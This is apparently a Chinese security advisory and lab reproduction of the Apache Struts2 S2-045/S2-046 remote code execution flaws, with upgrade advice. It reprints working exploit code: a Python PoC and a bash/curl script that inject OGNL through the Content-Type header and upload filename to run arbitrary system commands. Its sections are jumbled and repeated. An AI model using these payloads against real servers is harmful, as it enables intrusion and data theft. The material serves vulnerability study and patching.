图片 1

图片 2

图片 3

背景介绍

近日,安全研究人员发现著名J2EE框架——Struts2存在远程代码执行的漏洞,Struts2官方已经确认该漏洞(S2-045,S2-046),并定级为高危漏洞。

Struts2 的使用范围及其广泛,国内外均有大量厂商使用该框架。

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts
2是Struts的下一代产品,是在 struts
1和WebWork的技术基础上进行了合并的全新的Struts
2框架。(来源:百度百科)

漏洞复现

漏洞复现

漏洞描述

使用Jakarta插件处理文件上传操作时可能导致远程代码执行漏洞。

图片 4

3月7日凌晨,Apache官方发布Struts 2
紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露
,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。

S2-045漏洞影响的版本有:Struts 2.3.5 – Struts 2.3.31,Struts 2.5 –
Struts 2.5.10

继 3 月 7 日爆发的 S2-045 远程命令执行漏洞风波之后,今日 Struts2
官方发布另一个高危漏洞 S2-046,CVE 编号依然是
CVE-2017-5638,据官方披露,最新的漏洞与 S2-045
类似,只是攻击字段发生变化。修复方案依然与 S2-045 相同,升级至 2.3.32
或者 2.5.10.1 版本即可防御针对这两个漏洞攻击。

S2-045漏洞影响

攻击者可以通过构造HTTP请求头中的Content-Type值可能造成远程代码执行。

图片 5

图片 6

S2-045PoC(来源于网络:)

#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc():
    register_openers()
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
    response = urllib2.urlopen(request)
    print response.read()
poc()

S2-045公告

S2-046

S2-046漏洞影响(更新)

触发条件

上传文件的大小(由Content-Length头指定)大于Struts2允许的最大大小(2GB)。

header中的Content-Disposition中包含空字节。

文件名内容构造恶意的OGNL内容。

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts
2 是世界上最流行的Java Web服务器框架之一。

Struts2 是一个基于 MVC 设计模式的 Web 应用框架,它本质上相当于一个
servlet,在 MVC 设计模式中,Struts2 作为控制器 (Controller)
来建立模型与视图的数据交互。Struts2
的使用范围及其广泛,国内外均有大量厂商使用该框架。

S2-046PoC(来源于网络:https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723#)

POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z
Connection: close
 
------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain
Kaboom 
 
------WebKitFormBoundaryAnmUgTEhFhOZpr9z--


**S2-046PoC_2(来源于网络:https://gist.githubusercontent.com/frohoff/a3e24764561c0c18b6270805140e7600 )**

#!/bin/bash
 
url=$1
cmd=$2
shift
shift
 
boundary="---------------------------735323031399963166993862150"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")
 
printf -- "--$boundaryrnContent-Disposition: form-data; name="foo"; filename="%sb"rnContent-Type: text/plainrnrnxrn--$boundary--rnrn" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@
漏洞描述:

恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。

漏洞描述:

据漏洞提交者纰漏,S2-046 的利用条件有以下三个方面:

验证截图

图片 7

漏洞利用:

公网已经公开利用PoC,本地搭建环境测试,可看到成功执行“ifconfig”命令,如下图所示:

图片 8

PoC


1、系统必须使用 Jakarta 插件,检查 Struts2 配置文件中是否有以下配置:<constant name =“struts.multipart.parser”value =“jakarta-stream”/>

修复建议

  1. 严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。

  2. 如果您使用基于Jakarta插件,请升级到Apache Struts
    2.3.32或2.5.10.1版本。(强烈推荐)

友情提示:

Struts 2.3.32和Struts 2.5.10.1版本已修复该漏洞,下载地址:
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32
https
://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1

2、上传文件的大小(由 Content-LSength 头指定)大于 Struts2 允许的最大大小(2GB)

官网公告

https://cwiki.apache.org/confluence/display/WW/S2-046

3、文件名内容构造恶意的 OGNL 内容。

补丁地址

Struts
2.3.32:

Struts
2.5.10.1:

如果满足以上要求,Struts2 受影响版本将创建一个包含攻击者控制的异常文件名,使用 OGNL 值堆栈来定位错误消息,OGNL 值堆栈将插入任何 OGNL 变量($ {}或%{})作为 OGNL 表达式,然后实现任意代码执行。

目前网络上已披露出针对 S2-046 的 POC

https://github.com/pwntester/S2-046-PoC

参考

https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723#

文章来源:安全客

漏洞复现:

我们在本地搭建环境进行测试:

查看 Struts2 的配置文件,发现存在
<constant name =“struts.multipart.parser”value =“jakarta-stream”/>

图片 9

Struts2 的配置文件

下面进行网站上传测试,构造数据包如下,设定 Content-LSength 值大于 2GB,并构造恶意文件名,如下图所示:

图片 10

构造数据包

通过响应数据包可看到恶意代码成功执行,攻击成功,如下图所示:

图片 11

代码成功执行


友情提示:

1.请升级到 Apache Struts 2.3.32 或 2.5.10.1 版本,下载地址:
http://archive.apache.org/dist/struts/2.3.32/
http://archive.apache.org/dist/struts/2.5.10.1/
2.测试的时候设定 Content-LSength 值不大于
2GB也可以利用成功,原因未知。